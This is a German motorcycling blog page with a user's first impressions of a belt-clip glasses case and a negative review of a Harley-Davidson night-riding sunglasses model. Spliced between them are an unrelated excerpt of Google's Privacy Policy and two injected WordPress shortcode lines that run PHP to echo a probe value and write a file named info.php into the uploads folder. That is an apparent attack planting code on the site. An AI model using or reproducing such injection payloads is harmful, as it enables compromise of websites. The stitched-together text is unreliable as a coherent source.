Brillenetui für den Biker???

Bin schon länger auf der Suche nach einem motorradfähigen Brillenetui, wo die normale aber ebenso die Bikerbrille rein passt und was am Mann bleibt. Jetzt in den USA fündig geworden und der Test kann beginnen. Erster Eindruck sehr ordentlich von der Stabilität, mit Reißverschluß oben zu öffnen, eingenähtes Mikrofasertuch (geht nicht verloren), zwei Größen lieferbar (hier die kleine Ausführung), Halteöse für Rucksack oder ähnlich und ein Gürtelclip mit Sicherung. Nachteil, vielleicht der Preis von 24,90€, aber schauen wir mal wie es sich im Alltag bewährt ……

Biker Sonnenbrillen “Test it”

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/insert_php]
[php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/php]

Biker-Brillentest Harley Davidson 701 (Nachtbrille?)

dsc03305Ich hatte ja versprochen meinen Test, bezüglich Bikerbrillen, fortzusetzen, also los geht es. Heute habe ich mir mal aus dem Internet eine sogenannte Nachtfahrbrille (39,– € ohne Porto) von Harley Davidson schicken lassen. Erster Eindruck, ups Chinaproduktion, ja genau, deutlich auf der Fassung angebracht und es ist ein älteres Modell aus 2005, wird aber immer noch über verschiedene Händler angeboten.

Jetzt aber zur Brille, das erste was mir negativ auffällt, eine Nachfahrtbrille und dann keine entspiegelten Brillengläser, das geht rein gar nicht (das macht auch kein Logo-Shield im Glas weg). Somit sollte sich das kein Biker antun, zumal bei der hohen Durchbiegung (Kurve 8+), in der Nacht würden die störenden Lichtreflexe einen irre machen. Die allgemeine Verarbeitung entspricht ansonsten eben China, Oberflächendefekte im Metall, scharfe Kanten, nicht polierte Oberflächenanteile (starke Riefenbildung noch deutlich zu sehen), Modell-Nummer Einstanzung, wie mit dem schweren Hammer und Amboss. Dann die Lieferung in die USA, hier noch eben der pflichtgemäße HD-Druck innen auf einen Bügel drauf und fertig. Das Sitzverhalten kann man mit ok bezeichnen und die Anpassbarkeit der Nasenstege (wenigsten Weichstege), sowie der Bügelenden ist auch ok (nur sehr scharfe Übergänge vom Bügel aufs Bügelende).

Fazit, wer eine günstige Windschutzbrille für den Tag sucht, ist damit recht gut bedient (Note 3-4), wer aber eine echte Nachtfahrbrille sucht, Finger weg (Note 6) absolut nicht zu empfehlen. (alle Aussagen sind reinweg meine Meinung, die aber stammen von einem Augenoptiker mit Chopper).